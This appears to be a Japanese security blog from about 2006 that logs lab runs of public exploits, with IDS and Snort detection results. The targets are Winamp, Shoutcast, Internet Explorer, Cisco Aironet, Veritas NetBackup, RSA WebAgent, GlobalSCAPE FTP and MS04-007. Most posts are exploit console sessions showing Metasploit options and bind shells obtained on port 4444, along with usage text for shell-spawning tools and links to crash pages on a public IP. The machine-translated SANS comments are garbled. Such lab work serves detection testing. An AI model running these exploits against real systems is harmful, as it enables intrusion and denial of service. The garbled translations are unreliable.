つぶやき

このブログは,ご覧頂いたあなたのコンピュータが犯罪に利用されていないか?確認していただく為のひとつの手段としてご利用頂ければ幸いです。電子メール:amaterasu@job.email.ne.jp


テーマ:

■使い方

C:\>srvcheck2 -?
Services Permissions checker v2.0
(c) 2006 Andres Tarasco - atarasco@gmail.com

Usage:
-l list vulnerable services
-m <service> modify the configuration for that service
-c <command> Command to execute throw remote service
by default. bindshell application will be used
-H <Host> specify a remote host to connect ip/netbiosname)
-u <user> if not seletected Default logon credentials used)
-p <password> if not used Default logon credentials used)
-? Extended information with samples
examples:
srvcheck.exe -l (list local vulnerabilities)
srvcheck.exe -m service (spawn a shell at port 8080)
srvcheck.exe -m service -c "cmd.exe /c md c:\PWNED"
srvcheck -l -H host (list remote vulnerabilities)

C:\>




■MD5Sum

89b7dbaa6ef619f8c681ec077ae68d3c



■File Size

36,5 KB



■Description

Proof of concept of Sudhakar Govindavajhala and Andrew Appel paper (http://www.cs.princeton.edu/~sudhakar/papers/winval.pdf ) Running as an unprivileged user you can test if your services are vulnerable and can be used to install a backdoor. Both source code and binary included
Microsoft advisory: http://microsoft.com/technet/security/advisory/914457.mspx

SrvCheck v2.0 is able to perform this checks remotely using for example domain user credentials

Third part affected Software:

HP Software: "Pml Driver HPZ12" (HP Printer Laserjet 4200L PCL 6)
Audodesk: "Autodesk Licensing Service"
Dell Power Managment Software for network cards: "NICCONFIGSVC"
Macromedia: "Macromedia Licensing Service"
Zonelabs.com TrueVector Device Driver: "vsdatant"
C-Dilla Software: "C-DillaCdaC11BA"
Macrovision SECURITY Driver (Security Windows NT): "CdaC15BA"
Macrovision SECURITY Driver (Security Windows NT): "SecDrv"
Download FIX

Here is a short list of Known vulnerable services under XP sp2:

- Advanced User:
service: DcomLaunch ( SYSTEM )
Service: UpnpHost ( Local Service )
Service: SSDPSRV (Local Service)
- User:
Service: UpnpHost ( Local Service )
Service: SSDPSRV (Local Service)
- Network Config Operators:
service: DcomLaunch ( SYSTEM )
Service: UpnpHost ( Local Service )
Service: SSDPSRV (Local Service)
Service: DHCP ( SYSTEM )
Service: NetBT (SYSTEM - .sys driver)
Service DnsCache (SYSTEM)

Windows 2000 Professional SP4:

- Power User:
service: WMI - Windows Management Instrumentation Driver Extensions ( SYSTEM )

Windows 2003 Standard Edition:

- Power User:
service: DcomLaunch - DCOM Server Process Launcher ( LocalSystem )
service: kdc - Kerberos Key Distribution Center ( SYSTEM )

AD
いいね!した人  |  リブログ(0)

テーマ:

■コメント

Metasploit Framework 版で新たにリリースされました。



■実証コード

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- -------- ------- -------------------------------------------
required HTTPPORT 8080 The local HTTP listener port
optional HTTPHOST 0.0.0.0 The local HTTP listener host
optional REALHOST External address to use for redirects (NAT)

Payload: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC process Exit technique: "process", "thread", "seh"
required CMD The command string to execute

Target: Winamp 5.12 Universal


Metasploit Framework Usable Payloads
====================================

win32_exec Windows Execute Command
win32_passivex Windows PassiveX ActiveX Injection Payload
win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload
win32_passivex_stg Windows Staged PassiveX Shell
win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject
msf winamp_playlist_unc(win32_exec) > exploit
[*] Waiting for connections to http://192.168.221.110:8080/
[*] HTTP Client connected from 192.168.221.106:17058, redirecting...
[*] HTTP Client connected from 192.168.221.106:17059, sending 184 bytes of payload...
[*] HTTP Client connected from 192.168.221.106:17082, redirecting...
[*] HTTP Client connected from 192.168.221.106:17083, sending 184 bytes of payload...


AD
いいね!した人  |  リブログ(0)

テーマ:

■SANSコメント

While we're on the topic of audio software, there's a 0-day exploit out today for Winamp 5.12 that allows
我々がオーディオソフトウェアのトピックに関している間に、今日許す Winamp 5.12に対して出ている0日間の偉業があります
remote code execution via a crafted playlist (.pls) file. The proof-of-concept exploit suggests using an
作りあげられた playlist (.pls)ファイルによってのリモートコード実行。 「コンセプトの証明」 exploit は使うことを示唆する
iframe to trigger a 'drive-by' attack on anyone unlucky enough to visit a website containing a malicious
限定してウェブサイトを訪問するほど十分不運な誰もに対する「車からの射撃」攻撃を引き起こす iframe 悪意があります
iframe; say, third-party advertisers and forum websites--the usual vectors for this sort of thing.
iframe ;例えば、サードパーティー広告主とフォーラムウェブサイト - この種類のことのためのいつものベクトル。
Secunia's got a nice writeup of it here. There may be a work-around involving disassociating playlists
Secunia はここでそれのすてきな writeup を持っています。 そこ(に・で) playlists を切り離すことを伴う回避策であるかもしれません
(.pls, .m3u, etc...) and their mime types from the Winamp application. Other suggestions are welcome.
(.pls 、 .m3u など...)と(彼・それ)らのパントマイム師は Winamp アプリケーションからタイプします。 他の提案は歓迎されます。


■実証コード

C:\Report\Exploite\C>winamp.exe 192.168.221.180

Winamp 5.12 Remote Buffer Overflow Universal Exploit
Bug discovered & exploit coded by ATmaCA
Web:
http://www.spyinstructors.com && http://www.atmacasoft.com
E-Mail:
atmaca@icqmail.com
Credit to Kozan

crafted.pls has been created in the current directory.


■テストページ

http://www.spyinstructors.com/atmaca/research/winamp_ie_poc.htm


■実行画面

テストページにアクセスすると電卓(calc.exe)を始動しました。


winmap

AD
いいね!した人  |  リブログ(0)

テーマ:

項目

攻撃

リモート

攻撃ポート

8000

対象OS

Unix

CVE

調査未

MS

N/A

SP2

N/A

Ebdence

N/A

パケット

N/A


SANSのコメント

SHOUTCAST <= 1.9.4 Vulnerability, Exploit Available

On December 26, 2004, Secunia released an advisory regarding a vulnerabilty in Shoutcast. We've received a report about a few sites detecting odd log entries that fit the vulnerability description, with corresponding server crashes over the past few days. An exploit was published yesterday. The solution is to update to the latest version (v.1.9.5). The advisory is available at Secunia.
2004年12月26日に、 Secunia は Shoutcast で vulnerabilty に関して助言を発表しました。 我々はこれまでの数日にわたって、対応するサーバークラッシュで、弱点記述に適している奇妙なログ項目を発見している少数のサイトについての報告を受け取りました。 exploit が昨日発表されました。

解決は最新のバージョン(v.1.9.5)に更新することです。 助言は Secunia で利用可能です。


Updated to correct the original vulnerability publication date. This is an old hole, but there seem to be a number of people still running vulnerable versions. The exploit is new, and if you're running a SHOUTcast server, check your version.
オリジナルの弱点出版日付を修正するために更新されました。 これは古い穴です、しかしまだ傷つきやすいバージョンを走らせている多くの人々がいるように思われます。 exploit は新しいです、そしてもしあなたが SHOUTcast サーバーを走らせているなら、あなたのバージョンをチェックしてください。


The default port for SHOUTcast is 8000--Dshield shows a spike in targets on the 14th and more recently.
SHOUTcast のためのデフォルトポートは8000です - Dshield は14日に、そしてもっと最近標的でスパイクを見せます。


Port8000へのアクセス推移

8000

http://isc.sans.org/port_details.php?port=8000&repax=1&tarax=2&srcax=2&percent=N&days=40
(出展:SANS)


検証環境

優先度

OS

IP

Intruder:

Windows2000

192.168.221.11

Victim:

Windows2000

192.168.221.180

センサー

ProvenitaM10


実証コード

[root@linux iss]# clear

[root@linux iss]# ./shoutcast

[!] Shoutcast <= 1.9.4 exploit by crash-x

[-] Usage: ./shoutcast -h <host> [options]

[!] Options:

-h Hostname you want attack (required)

-p Port of the shoutcast (default: 8000)

-t Target (default: 0)

-s How long to sleep before try connect to shell in s (default: 1)

-S How long to sleep before write the next byte of shellcode to the memory in ms (default: 7)

[!] Targets:

0 Try to determine target

1 Shoutcast 1.9.4 all Linux distros

2 Shoutcast 1.9.2 all Linux distros

[root@linux iss]# ./shoutcast -h 192.168.221.180

[root@linux iss]# ./shoutcast -h 192.168.221.180

[!] Shoutcast <= 1.9.4 exploit by crash-x

[!] Connecting to target... done!

[-] Wasnt able to determine version of server, do it yourself!


トレースソース


トレース

優先度

シグネチャ名

備考

Low

HTTP_Get

/doesntmatter

Low

TCP_Probe_Proxy







いいね!した人  |  リブログ(0)

テーマ:

■コメント

ここ最近のInternet Explorerに対するDoS攻撃です。

以下のテストサイト1~9のURLを閲覧することでInternet Explorerが「問題が発生したため、iexplore.exe を終了します。 ご不便をおかけして申し訳ありません。」という表示が出て落ちます。



■テスト1

2006-01-18 MS Internet Explorer <= 6.x (IMG / XML elements) Denial of Service

http://61.125.228.203/test1.htm


■テスト2

2005-12-29 MS Internet Explorer 6.0 (mshtml.dll div) Denial of Service Exploit

http://61.125.228.203/test2.htm


■テスト3

2005-12-27 MS Internet Explorer 6.0 (mshtml.dll datasrc) Denial of Service Vuln
http://61.125.228.203/test3.htm


■テスト4

2005-12-14 MS Internet Explorer 6.0 (pre tag multiple single tags) Denial of Service
http://61.125.228.203/test4.htm


■テスト5

2005-10-28 MS Internet Explorer 6.0 (mshtmled.dll) Denial of Service Exploit

http://61.125.228.203/test5.htm


■テスト6

2005-05-31 MS Internet Explorer - Multiple Stack Overflows Crash

http://61.125.228.203/test6.htm


■テスト7

2005-05-31 MS Internet Explorer - Multiple Stack Overflows Crash

http://61.125.228.203/test7.htm


■テスト8
2005-04-12 MS Internet Explorer DHTML Object Memory Corruption Exploit

http://61.125.228.203/test8.htm


■テスト9
2005-01-12 MS Internet Explorer .ANI Remote Stack Overflow (0.2)

http://61.125.228.203/test9.htm

いいね!した人  |  リブログ(0)

テーマ:

■影響

対象システムでの検証未、影響不明

以下、対象システム
* Cisco Aironet 1400 Series Wireless Bridges
* Cisco Aironet 1300 Series Access Points
* Cisco Aironet 1240AG Series Access Points
* Cisco Aironet 1230AG Series Access Points
* Cisco Aironet 1200 Series Access Points
* Cisco Aironet 1130AG Series Access Points
* Cisco Aironet 1100 Series Access Points
* Cisco Aironet 350 Series Access Points (running IOS)


対策
Upgrade to Cisco IOS version 12.3-7-JA2. For more information see: http://www.cisco.com/public/sw-center/sw-wireless.shtml


■検証環境

・攻撃元:192.168.221.110 Linux

・攻撃対象:192.168.221.180 Win2K


■実証コード

[root@linux iss]# ./ciskill 192.168.221.1
CisKill -- Aironet Cisco Killer
Coded by: Pasv
Discovery credit: Eric Smith
Using device: 192.168.221.1

Press ctrl+c immediately if you wish to stop
Going in 5
4
3
2
1!
#:-1073742290 bytes sent: -1 (should be 42)
#:-1073742289 bytes sent: -1 (should be 42)
#:-1073742288 bytes sent: -1 (should be 42)
#:-1073742287 bytes sent: -1 (should be 42)
#:-1073742286 bytes sent: -1 (should be 42)
#:-1073742285 bytes sent: -1 (should be 42)
#:-1073742284 bytes sent: -1 (should be 42)
#:-1073742283 bytes sent: -1 (should be 42)
#:-1073742282 bytes sent: -1 (should be 42)
#:-1073742281 bytes sent: -1 (should be 42)
#:-1073742280 bytes sent: -1 (should be 42)
#:-1073742279 bytes sent: -1 (should be 42)
#:-1073742278 bytes sent: -1 (should be 42)
#:-1073742277 bytes sent: -1 (should be 42)
#:-1073742276 bytes sent: -1 (should be 42)
#:-1073742275 bytes sent: -1 (should be 42)
#:-1073742274 bytes sent: -1 (should be 42)
#:-1073742273 bytes sent: -1 (should be 42)
#:-1073742272 bytes sent: -1 (should be 42)
#:-1073742271 bytes sent: -1 (should be 42)
#:-1073742270 bytes sent: -1 (should be 42)
#:-1073742269 bytes sent: -1 (should be 42)
#:-1073742268 bytes sent: -1 (should be 42)
#:-1073742267 bytes sent: -1 (should be 42)
#:-1073742266 bytes sent: -1 (should be 42)
#:-1073742265 bytes sent: -1 (should be 42)
#:-1073742264 bytes sent: -1 (should be 42)
#:-1073742263 bytes sent: -1 (should be 42)
#:-1073742262 bytes sent: -1 (should be 42)
#:-1073742261 bytes sent: -1 (should be 42)
#:-1073742260 bytes sent: -1 (should be 42)
#:-1073742259 bytes sent: -1 (should be 42)
#:-1073742258 bytes sent: -1 (should be 42)
#:-1073742257 bytes sent: -1 (should be 42)


■Proveintaでの検知結果

N/A


■Snort

N/A


■パケット

いいね!した人  |  リブログ(0)

テーマ:

■コメント

1月16日に公開されたNetBackup Stack Overflow (tcp/13701)へ実証コードについて検証しました。
また、昨日この実証コードを利用したと思われる。ポート13701へのアクセスが増加しております。


・検知グラフ

1307
(出展:SANShttp://isc.sans.org/diary.php )


・詳細

http://isc.sans.org/specialport.php?port=13701



■脆弱性の概要

http://www.idefense.com/intelligence/vulnerabilities/display.php?id=336
http://www.frsirt.com/english/advisories/2005/2349

http://seer.support.veritas.com/docs/279553.htm

■検証環境

・攻撃元

192.168.221.11 W2K

・攻撃対象

192.168.221.180 Win2K+SP4


■影響

対象アプリケーションをインストールしていない為、影響まで確認できていません。

実証コードのコメントから攻撃が成功するとリモートからアクセスできるようです。


■実証コード

C:\NetBackup>nb 192.168.221.11 4444 192.168.221.180 0
Veritas NetBackup v4/v5 "Volume Manager Daemon" Stack Overflow.
Sending first buffer.
Sending second buffer.

C:\NetBackup>nc 192.168.221.180 4444
Microsoft Windows 2000 [versie 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>


■Proveintaでの検知結果

Event Number : 1
Date/Time : 2006-01-19 00:48:22 JST
Tag Name : TCP_Probe_Other
Alert Name : TCP_Probe_Other
Severity : Low
Tag Brief Description :
Observance Type : Intrusion Detection
Combined Event Count : 2
Cleared Flag : No
Target DNS Name :
Target IP Address : 192.168.37.180
Target Object Name : 13701
Target Object Type : Target Port
Target Service :
Source DNS Name :
Source IP Address : 192.168.221.11
SourcePort Name : 1079
Sensor DNS Name :
Sensor IP Address : 192.168.221.11
Sensor Name : network_sensor_1

Attribute Value Pairs for Event Number : 1
Attribute Name : :end-time
Attribute Value : 2006-01-19T00:46:46+09:00
Attribute Name : :intruder-ip-addr
Attribute Value : 192.168.221.11
Attribute Name : :intruder-port
Attribute Value : 1079
Attribute Name : :port
Attribute Value : 13701
Attribute Name : :reason
Attribute Value : RSTsent
Attribute Name : :repeat-count
Attribute Value : 2
Attribute Name : :start-time
Attribute Value : 2006-01-19T00:46:41+09:00
Attribute Name : :victim-ip-addr
Attribute Value : 192.168.37.180
Attribute Name : :victim-port
Attribute Value : 13701
Attribute Name : algorithm-id
Attribute Value : 2003102
Attribute Name : IANAProtocolId
Attribute Value : 6
Attribute Name : Packet DestinationAddress
Attribute Value : 192.168.221.11
Attribute Name : Packet DestinationPort
Attribute Value : 1079
Attribute Name : Packet SourceAddress
Attribute Value : 192.168.37.180
Attribute Name : Packet SourcePort
Attribute Value : 13701



■Snortでの検知結果


N/A


いいね!した人  |  リブログ(0)

テーマ:

■攻撃元

192.168.221.11 W2K

■攻撃対象

192.168.221.180 Win2K+Engish


■影響

対象アプリケーションで検証未


■実証コード

msf rsa_iiswebagent_redirect(win32_bind) > show targets

Supported Exploit Targets
=========================

0 RSA WebAgent 5.2
1 RSA WebAgent 5.3
2 RSA WebAgent 5.2 on Windows 2000 English
3 RSA WebAgent 5.3 on Windows 2000 English
4 RSA WebAgent 5.2 on Windows XP SP0-SP1 English
5 RSA WebAgent 5.3 on Windows XP SP0-SP1 English
6 RSA WebAgent 5.2 on Windows XP SP2 English
7 RSA WebAgent 5.3 on Windows XP SP2 English
8 RSA WebAgent 5.2 on Windows 2003 English SP0
9 RSA WebAgent 5.3 on Windows 2003 English SP0

msf rsa_iiswebagent_redirect(win32_bind) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ ------------------------ -------------------
optional SSL Use SSL
required URL /WebID/IISWebAgentIF.dll The path to the DLL
required RHOST 192.168.221.180 The target address
required RPORT 80 The target port

Payload: Name Default Description
-------- -------- ------- ------------------------------------------

required EXITFUNC seh Exit technique: "process", "thread", "seh"
required LPORT 4444 Listening port for bind shell

Target: RSA WebAgent 5.2 on Windows 2000 English

msf rsa_iiswebagent_redirect(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Attempting to exploit target RSA WebAgent 5.2 on Windows 2000 English
[*] Sending 8273 bytes to remote host.
[*] Waiting for a response...
[*] Exiting Bind Handler.



■Proveintaでの検知結果

Event Number : 1
Date/Time : 2006-01-15 13:55:14 JST
Tag Name : HTTP_IIS_RSA_WebAgent_BO
Alert Name : HTTP_IIS_RSA_WebAgent_BO
Severity : High
Tag Brief Description :
Observance Type : Intrusion Detection
Combined Event Count : 1
Cleared Flag : No
Target DNS Name :
Target IP Address : 192.168.221.180
Target Object Name : 80
Target Object Type : Target Port
Target Service :
Source DNS Name :
Source IP Address : 192.168.221.11
SourcePort Name : 2465
Sensor DNS Name : iss-sp2
Sensor IP Address : 10.4.6.100
Sensor Name : network_sensor_1

Attribute Value Pairs for Event Number : 1
Attribute Name : :accessed
Attribute Value : no
Attribute Name : :arg
Attribute Value : Redirect?url=eHkdblAYOgTvvARpwbCkvoxHkVPslYPTAAHGYAAjAAnhfnAGlilvTHKViIAAfvkPAvCMbEAXApAAyTuAAfBAxjFNJTMfAAVgkHOaUbAtkAbXsDoYCnApTAKHAAajAmCjglXMpAnKAAUKNbgIwAeAfAAAhLAwEGRaWAcsAAjlPWAAAgIJDAONApqfPbqbucdlSeOQAotBJTkyAqFDAdmAUAWKAAPRhUILCkASAAUYicKy
Attribute Name : :code
Attribute Value : 404
Attribute Name : :http-server
Attribute Value : Microsoft-IIS/5.0
Attribute Name : :intruder-ip-addr
Attribute Value : 192.168.221.11
Attribute Name : :intruder-port
Attribute Value : 2465
Attribute Name : :server
Attribute Value : 192.168.221.180:80
Attribute Name : :URL
Attribute Value : /WebID/IISWebAgentIF.dll
Attribute Name : :victim-ip-addr
Attribute Value : 192.168.221.180
Attribute Name : :victim-port
Attribute Value : 80
Attribute Name : algorithm-id
Attribute Value : 2121035
Attribute Name : IANAProtocolId
Attribute Value : 6
Attribute Name : LOGEVIDENCE
Attribute Value : Default
Attribute Name : Packet DestinationAddress
Attribute Value : 192.168.221.180
Attribute Name : Packet DestinationPort
Attribute Value : 80
Attribute Name : Packet DestinationPortName
Attribute Value : http
Attribute Name : Packet SourceAddress
Attribute Value : 192.168.221.11
Attribute Name : Packet SourcePort
Attribute Value : 2465


■Snortでの検知結果

01/15-13:54:34.495050 [**] [119:4:1] (http_inspect) BARE BYTE UNICODE ENCODING [**] {TCP} 192.168.221.11:2465 -> 192.168.37.180:80

いいね!した人  |  リブログ(0)

テーマ:

■実証コード

msf globalscapeftp_user_input(win32_bind) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ ----------- ------------------
optional SSL Use SSL
required PASS metasploit@ Password
required RHOST The target address
required RPORT 21 The target port
required USER anonymous Username

Payload: Name Default Description
-------- -------- ------- ------------------------------------------

required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LPORT 4444 Listening port for bind shell

Target: GlobalSCAPE Secure FTP Server <= 3.0.2 Universal

msf globalscapeftp_user_input(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Trying GlobalSCAPE Secure FTP Server <= 3.0.2 Universal using return addres
0x1002f01f....
[*] 220 test-7nz5l7tfed Microsoft FTP Service (Version 5.0).
[*] Login as anonymous/metasploit@
[*] Sending evil buffer....
[*] Exiting Bind Handler.


■snortでの検知結果

01/15-13:44:48.151148 [**] [119:4:1] (http_inspect) BARE BYTE UNICODE ENCODING [**] {TCP} 192.168.221.11:2342 -> 192.168.37.180:80
01/15-13:44:50.043350 [**] [122:1:0] (portscan) TCP Portscan [**] {PROTO255} 192.168.221.11 -> 192.168.37.180
01/15-13:48:41.540604 [**] [1:1748:8] FTP command overflow attempt [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.221.11:2347 -> 192.168.37.180:21
01/15-13:48:41.541239 [**] [1:1748:8] FTP command overflow attempt [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.221.11:2347 -> 192.168.37.180:21
01/15-13:48:41.541763 [**] [1:1748:8] FTP command overflow attempt [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.221.11:2347 -> 192.168.37.180:21


いいね!した人  |  リブログ(0)

テーマ:

■脆弱性の説明MSMS04-007

http://www.microsoft.com/japan/technet/security/Bulletin/MS04-007.mspx

■攻撃元

192.168.221.11 W2K

■攻撃対象

192.168.221.180 Win2K+Engish WinXP+Japane


■影響

以下の実証コードでは、攻撃が成功し、対象ホストのPort4444を利用して、

リモートから接続できることを確認しました。


■実証コード

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ ------- ---------------------------
optional SSL The target service uses SSL
required RHOST The target address
required RPORT 445 The target service port
required PROTO smb Protocol (smb or http)

Payload: Name Default Description
-------- -------- ------- ------------------------------------------

required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LPORT 4444 Listening port for bind shell

Target: Windows 2000 SP2-SP4 + Windows XP SP0-SP1

msf msasn1_ms04_007_killbill(win32_bind) > set RHOST 192.168.221.180
RHOST -> 192.168.221.180

msf msasn1_ms04_007_killbill(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Attempting to exploit target Windows 2000 SP2-SP4 + Windows XP SP0-SP1
[*] Sending SMB negotiate request...
[*] Got connection from 192.168.221.11:1894 <-> 192.168.221.180:4444

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.37.180
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.37.1


■Proveintaでの検知結果

Event Number : 1
Date/Time : 2006-01-15 12:38:32 JST
Tag Name : ASN1_Constr_BitStr_Heap_Corruption
Alert Name : ASN1_Constr_BitStr_Heap_Corruption
Severity : High
Tag Brief Description :
Observance Type : Intrusion Detection
Combined Event Count : 1
Cleared Flag : No
Target DNS Name :
Target IP Address : 192.168.37.180
Target Object Name : 445
Target Object Type : Target Port
Target Service :
Source DNS Name :
Source IP Address : 192.168.221.11
SourcePort Name : 2157
Sensor DNS Name :
Sensor IP Address : 192.168.221.11
Sensor Name : network_sensor_1

Attribute Value Pairs for Event Number : 1
Attribute Name : :intruder-ip-addr
Attribute Value : 192.168.221.11
Attribute Name : :intruder-port
Attribute Value : 2157
Attribute Name : :offset
Attribute Value : 1060
Attribute Name : :protocol
Attribute Value : SMB
Attribute Name : :victim-ip-addr
Attribute Value : 192.168.37.180
Attribute Name : :victim-port
Attribute Value : 445
Attribute Name : algorithm-id
Attribute Value : 2120072
Attribute Name : IANAProtocolId
Attribute Value : 6
Attribute Name : Packet DestinationAddress
Attribute Value : 192.168.37.180
Attribute Name : Packet DestinationPort
Attribute Value : 445
Attribute Name : Packet DestinationPortName
Attribute Value : microsoft-ds
Attribute Name : Packet SourceAddress
Attribute Value : 192.168.221.11
Attribute Name : Packet SourcePort
Attribute Value : 2157


■Snort

overflow attempt [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.221.11:2157 -> 192.168.37.180:445
01/15-12:39:59.839951 [**] [1:1917:6] SCAN UPnP service discover attempt [**] [Classification:

overflow attempt [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.221.11:2173 -> 192.168.37.180:445



いいね!した人  |  リブログ(0)

AD

ブログをはじめる

たくさんの芸能人・有名人が
書いているAmebaブログを
無料で簡単にはじめることができます。

公式トップブロガーへ応募

多くの方にご紹介したいブログを
執筆する方を「公式トップブロガー」
として認定しております。

芸能人・有名人ブログを開設

Amebaブログでは、芸能人・有名人ブログを
ご希望される著名人の方/事務所様を
随時募集しております。